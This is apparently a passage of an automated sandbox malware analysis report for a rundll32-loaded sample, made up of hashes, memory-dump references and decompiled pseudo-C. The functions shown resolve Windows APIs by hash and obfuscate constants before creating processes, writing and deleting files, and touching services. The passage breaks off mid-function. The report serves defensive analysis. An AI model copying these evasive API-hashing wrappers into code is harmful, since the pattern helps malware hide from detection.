0x00b397a3
0x00b397a6
0x00b397a7
0x00b397a8
0x00b397ad
0x00b397b7
0x00b397c3
0x00b397ca
0x00b397d1
0x00b397d8
0x00b397df
0x00b397e3
0x00b397fc
0x00b39816
0x00b3981d

APIs

CreateProcessW.KERNEL32(00B2591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00B2591A), ref: 00B39816

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 9d914b6e879a9afcffa9acd9fcce6acf9c8bce99182d17a9314c2a1310d6704a
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 6311B372901148FBDF1A9F96DC0ACDF7F7AEF89750F104188FA1556120D2728A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10029D17, Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction ID: 2a7355f5bd8dfc1c477535d0dfa17a080f77eb11a6ba006502a217067f0a1b70
Opcode Fuzzy Hash: 4028b3ffdbf220f5ccbab449946e7a0f9cd60c0eee147c0f303152eafb118c99
Instruction Fuzzy Hash: 2F01B537700621AFFB15DE69ED80A8A37D6EB862E07A14121FE04DB155DA30D801E754

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00B2B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E00B2602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E00B307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x00b2b569
0x00b2b56a
0x00b2b56d
0x00b2b572
0x00b2b574
0x00b2b577
0x00b2b57a
0x00b2b57d
0x00b2b580
0x00b2b583
0x00b2b586
0x00b2b587
0x00b2b58a
0x00b2b58d
0x00b2b590
0x00b2b593
0x00b2b594
0x00b2b595
0x00b2b59a
0x00b2b5a4
0x00b2b5b8
0x00b2b5c0
0x00b2b5c4
0x00b2b5cb
0x00b2b5d2
0x00b2b5d9
0x00b2b5e6
0x00b2b5fd
0x00b2b604

APIs

CreateFileW.KERNELBASE(00B30668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00B30668,?,?,?,?), ref: 00B2B5FD

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 5bd14d6a2b830140400017d4a52a60befbf9967544205dbdeb4e547f72a46e5a
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: C511B272801248BBDF16DF95DD06CEE7FBAEF89314F148198FA1862120D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 10031EE4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 10026850: RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

_free.LIBCMT ref: 10031F53

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction ID: 5ecf24b48f6bf668a87eb7aba8164494cce5243ea809713a93c3c489f3a86baa
Opcode Fuzzy Hash: b71b12b2ef210f463b7843e26c027f50fdbc803602e45414ae83a0b50f81752a
Instruction Fuzzy Hash: F8012B72604356AFC321CF64D8819C9FBA8EB093B0F550739E559A76C0D770AC10C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00B3981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00B3981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00B2602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E00B307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00b39821
0x00b39822
0x00b39825
0x00b39828
0x00b3982a
0x00b3982c
0x00b3982f
0x00b39832
0x00b39835
0x00b39836
0x00b39837
0x00b3983c
0x00b39855
0x00b39858
0x00b3985f
0x00b39866
0x00b3986d
0x00b39874
0x00b3987b
0x00b3988e
0x00b3989b
0x00b398a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,00B287F2,0000CAAE,0000510C,AD82F196), ref: 00B3989B

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: abb767fbde75a946bbd4f95d9835df881bd636730d84b949f204fbc628e7b473
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 06015E76801208FBDB04EFD5D846CDF7FB9EF85750F108199F91866220E6715B519BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B37BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00B37BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E00B307A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00b37bf7
0x00b37bf8
0x00b37bfa
0x00b37bfd
0x00b37bff
0x00b37c02
0x00b37c06
0x00b37c07
0x00b37c0f
0x00b37c1d
0x00b37c25
0x00b37c2d
0x00b37c31
0x00b37c38
0x00b37c3f
0x00b37c46
0x00b37c4a
0x00b37c5e
0x00b37c67
0x00b37c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00B37C67

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 1f60b3f4a6a2b222ed2ba6a69c0a311707ebeabf75b3d3bfb41a8442e7ddf218
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: A3014FB190120CFFEB09DFA4D84A9DE7BB5EF44314F208198F40567240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 10026850, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000364,00000000,?,10024158,00000001,00000364,FFFFFFFF,000000FF), ref: 10026891

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction ID: cee442b2a179b10d771ae8e348697f5776a900ac618982ed1d16fb6086920af7
Opcode Fuzzy Hash: 89b74a9fedc6c44e7e8eb0d2ef1166fcc57b5d159e965e5deff0e72c928abcbc
Instruction Fuzzy Hash: F1F0B43560162566DB51DE66ED05B5A3798EB497A0BA24221BC04D71C4DE30FC0082E4

Uniqueness

Uniqueness Score: -1.00%

Function 00B2B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B2B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E00B2602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E00B307A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x00b2b6f3
0x00b2b6f8
0x00b2b702
0x00b2b70b
0x00b2b712
0x00b2b719
0x00b2b720
0x00b2b727
0x00b2b72e
0x00b2b747
0x00b2b759
0x00b2b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 00B2B759

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: f28f6e01b017acc97648045d876fcc78b5bb841d77f212fc2197823d302a2c31
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: FB014FB594130CFBEF45DF94DD06E9E7BB5EF14704F108188FA0966190D3B15E20AB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B3AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00B3AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E00B307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x00b3aa3f
0x00b3aa40
0x00b3aa41
0x00b3aa44
0x00b3aa47
0x00b3aa4b
0x00b3aa4c
0x00b3aa51
0x00b3aa5b
0x00b3aa64
0x00b3aa68
0x00b3aa6f
0x00b3aa76
0x00b3aa8d
0x00b3aa90
0x00b3aa9d
0x00b3aaa8
0x00b3aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 00B3AAA8

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: a82c612d704d496449b1a38b96d8746a7a325082c56d5b376c0b89cebf042d62
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 01F069B190020CFFDF08EFA4DD4A99EBFB4EB40304F108088F805A6250D3B29F549B50

Uniqueness

Uniqueness Score: -1.00%

Function 00B25FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00B25FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E00B307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00b25fb5
0x00b25fb6
0x00b25fb7
0x00b25fbb
0x00b25fbc
0x00b25fc1
0x00b25fcb
0x00b25fd7
0x00b25fde
0x00b25fe5
0x00b25ffc
0x00b25fff
0x00b26006
0x00b2600d
0x00b2601a
0x00b26025
0x00b2602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00B26025

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 55c1cee22f6ae6e41c050f8966237e8022273be82c50ded43e5be4a321bab56d
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: E4F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7719F15AF54

Uniqueness

Uniqueness Score: -1.00%

Function 1000D717, Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,1000D871,00000001,FlsFree,10043994,FlsFree,00000000,?,10005B57,FFFFFFFF,1000528D), ref: 1000D748

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction ID: 6ae50cf1bc1ad4758d4872c1d4d64a6e8e48722a32411315d8df479ee4492f30
Opcode Fuzzy Hash: 0cd0d46ad6376f16837434476ef1c2c325eb3e89ea54d8bfda6593936f27b7ea
Instruction Fuzzy Hash: 8DF082362086569FAF02EE69AC4094E37E8EF017E07100526FA18D6198FB71D810CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 10024214, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,70D9FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

Memory Dump Source

Source File: 00000007.00000002.2112853162.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2112844322.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113030372.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2113073198.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2113096062.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction ID: 48365c050a20ae6f6e82cadb15bda1ead02787d9cc2971144663992c1c58e65a
Opcode Fuzzy Hash: e01005b422e904f5de0f4a74a71fcacc2905bcfe713e71daf336211572b189cc
Instruction Fuzzy Hash: EFE06535640261D6E625EB67BD0174B3BF8EF823E0FD30160FE649A0D5DF64DC0495A5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100079E0, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E100079E0(signed int* _a4, signed int* _a8) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				char _v48;
				signed int _v52;
				char* _v56;
				signed int _v60;
				void* _v64;
				signed int _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char* _v96;
				signed int _v100;
				char _v108;
				char _v116;
				char _v124;
				char _v132;
				char _v140;
				void* __ebx;
				intOrPtr _t404;
				signed int _t406;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t418;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				intOrPtr* _t427;
				signed int _t429;
				signed int _t430;
				signed int _t433;
				signed int _t434;
				signed int* _t435;
				unsigned int _t446;
				signed char _t448;
				unsigned int _t449;
				signed char _t451;
				signed int _t457;
				signed int _t471;
				signed int _t472;
				signed int _t473;
				signed int _t496;
				signed int _t500;
				signed int _t507;
				signed int _t514;
				signed int _t519;
				signed int _t524;
				signed int _t536;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				signed int _t540;
				signed char _t543;
				signed int* _t547;
				signed int _t548;
				intOrPtr* _t550;
				signed int _t552;
				unsigned int _t559;
				signed char _t561;
				void* _t563;
				unsigned int _t568;
				signed char _t570;
				unsigned int _t577;
				signed char _t579;
				signed int _t583;
				void* _t586;
				char** _t614;
				void* _t618;
				void* _t622;
				intOrPtr* _t625;
				signed int _t627;
				signed int* _t632;
				signed int _t638;
				signed int _t642;
				void* _t655;
				signed char _t670;
				signed char _t673;
				char** _t678;
				void* _t681;
				intOrPtr* _t689;
				intOrPtr* _t692;
				signed int* _t695;
				signed int _t696;
				signed int _t697;
				signed int _t700;
				signed int _t701;
				signed int _t706;
				signed int _t717;
				signed int _t719;
				signed int _t724;
				signed int _t726;
				signed int _t727;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t742;
				signed int _t745;
				signed int _t748;
				signed int _t750;
				signed int _t761;
				unsigned int _t762;
				signed int _t770;
				char** _t793;
				signed char _t811;
				void* _t830;
				signed int _t833;
				unsigned int _t844;
				signed int* _t853;
				signed int _t854;
				signed int _t855;
				signed int _t861;
				signed int _t863;
				void* _t864;
				signed int _t867;
				signed int _t868;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t875;
				signed int _t879;
				signed int _t881;
				void* _t884;

				_t404 =  *0x1004e004; // 0x0
				_t867 = 0;
				_v100 = _t404 -  *0x1004e008;
				_v20 = 0;
				_v16 = 0;
				_t406 = E1000C74B();
				_t853 = _a8;
				_t696 = _t406;
				_t697 =  *_t853;
				if(_t697 == 0) {
					L2:
					_v92 = _t867;
					L3:
					if(_t696 == 0xffff) {
						_t695 = _a4;
						_t695[1] = _t867;
						_t695[1] = 2;
						 *_t695 = _t867;
						return _t695;
					}
					__eflags = _t696 - 0xfffe;
					if(_t696 == 0xfffe) {
						E10007662(_t697, _a4, 1, _t853);
						return _a4;
					}
					__eflags = _t696 - 0xfffd;
					if(_t696 == 0xfffd) {
						_t692 = _a4;
						 *_t692 = _t697;
						 *(_t692 + 4) =  *(_t853 + 4);
						return _t692;
					}
					_t871 = _t696 & 0x00008000;
					__eflags = _t871;
					_v40 = _t871;
					if(_t871 == 0) {
						L98:
						E100077A0( &_v20, _t853);
						__eflags = _t871;
						if(_t871 != 0) {
							L104:
							__eflags = (_t696 & 0x0000fc00) - 0x7c00;
							if(__eflags != 0) {
								_t868 = _v40;
								_t872 = _t696;
								_t854 = _t696;
								__eflags = _t868;
								if(__eflags == 0) {
									_t855 = _t854 & 0x00006000;
									_t412 = 0;
									_t413 = _t412 & 0xffffff00 | __eflags == 0x00000000;
									_t873 = _t872 & 0x00001800;
									__eflags = _t873;
								} else {
									_t873 = _t872 & 0x00001800;
									__eflags = _t873 - 0x800;
									_t413 = 0 | _t873 == 0x00000800;
									_t855 = _t854 & 0x00006000;
								}
								__eflags = _t413;
								_v28 = _t855;
								_t700 = _t696;
								_t414 = _t696;
								if(_t413 == 0) {
									_t415 = _t414 & 0x00001000;
									_t701 = _t700 & 0x00000400;
									__eflags = _t701;
									_v40 = _t701;
									_v36 = _t415;
								} else {
									_t415 = _t414 & 0x00000400;
									_v40 = _t415;
									_v36 = _t700 & 0x00001000;
								}
								__eflags = _t415;
								if(_t415 == 0) {
									L117:
									__eflags = _t868;
									if(_t868 == 0) {
										__eflags = _t855;
									} else {
										__eflags = _t873 - 0x800;
									}
									__eflags = 0 | __eflags == 0x00000000;
									_t418 = _v40;
									if(__eflags == 0) {
										_t418 = _v36;
									}
									__eflags = _t418;
									if(_t418 == 0) {
										L125:
										__eflags = _t868;
										if(_t868 == 0) {
											__eflags = _t855;
										} else {
											__eflags = _t873 - 0x800;
										}
										__eflags = 0 | __eflags == 0x00000000;
										_t421 = _v40;
										if(__eflags == 0) {
											_t421 = _v36;
										}
										__eflags = _t421;
										if(_t421 == 0) {
											L141:
											__eflags = _t868;
											if(_t868 != 0) {
												goto L134;
											}
											__eflags = (_t696 & 0x00007c00) - 0x7800;
											if((_t696 & 0x00007c00) == 0x7800) {
												goto L223;
											}
											goto L143;
										} else {
											asm("sbb eax, eax");
											_t507 =  ~((_t696 & 0x00001b00) - 0x1200) + 1;
											_t745 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t507 & _t745;
											if((_t507 & _t745) == 0) {
												goto L141;
											}
											_v12 = "`template static data member destructor helper\'";
											_v8 = 0x2f;
											goto L133;
										}
									} else {
										asm("sbb eax, eax");
										_t514 =  ~((_t696 & 0x00001b00) - 0x1100) + 1;
										_t748 =  ~_t868;
										asm("sbb ecx, ecx");
										__eflags = _t514 & _t748;
										if((_t514 & _t748) == 0) {
											goto L125;
										}
										_v12 = "`template static data member constructor helper\'";
										_v8 = 0x30;
										goto L133;
									}
								} else {
									asm("sbb eax, eax");
									_t519 =  ~((_t696 & 0x00001b00) - 0x1000) + 1;
									_t750 =  ~_t868;
									asm("sbb ecx, ecx");
									__eflags = _t519 & _t750;
									if((_t519 & _t750) == 0) {
										goto L117;
									}
									_v12 = "`local static destructor helper\'";
									_v8 = 0x20;
									L133:
									E10007748( &_v20,  &_v12);
									__eflags = _t868;
									if(_t868 == 0) {
										L143:
										_t422 = 0;
										__eflags = _v28;
										L135:
										__eflags = _t422 & 0xffffff00 | __eflags == 0x00000000;
										_t424 = _v40;
										if(__eflags == 0) {
											_t424 = _v36;
										}
										__eflags = _t424;
										if(_t424 == 0) {
											L144:
											_t427 = E1000A3FB(_t696,  &_v48,  &_v20);
											goto L145;
										} else {
											_t863 = _t696 & 0x00001b00;
											__eflags = _t863 - 0x1100;
											_t496 = 0 | _t863 == 0x00001100;
											_t742 =  ~_t868;
											asm("sbb ecx, ecx");
											__eflags = _t496 & _t742;
											if((_t496 & _t742) != 0) {
												L140:
												_t427 = E10007637(_t742,  &_v48, 0x20,  &_v20);
												L145:
												_v16 =  *((intOrPtr*)(_t427 + 4));
												_v20 =  *_t427;
												__eflags = _t868;
												if(__eflags == 0) {
													_t706 = _t696 & 0x00006000;
													_t429 = 0;
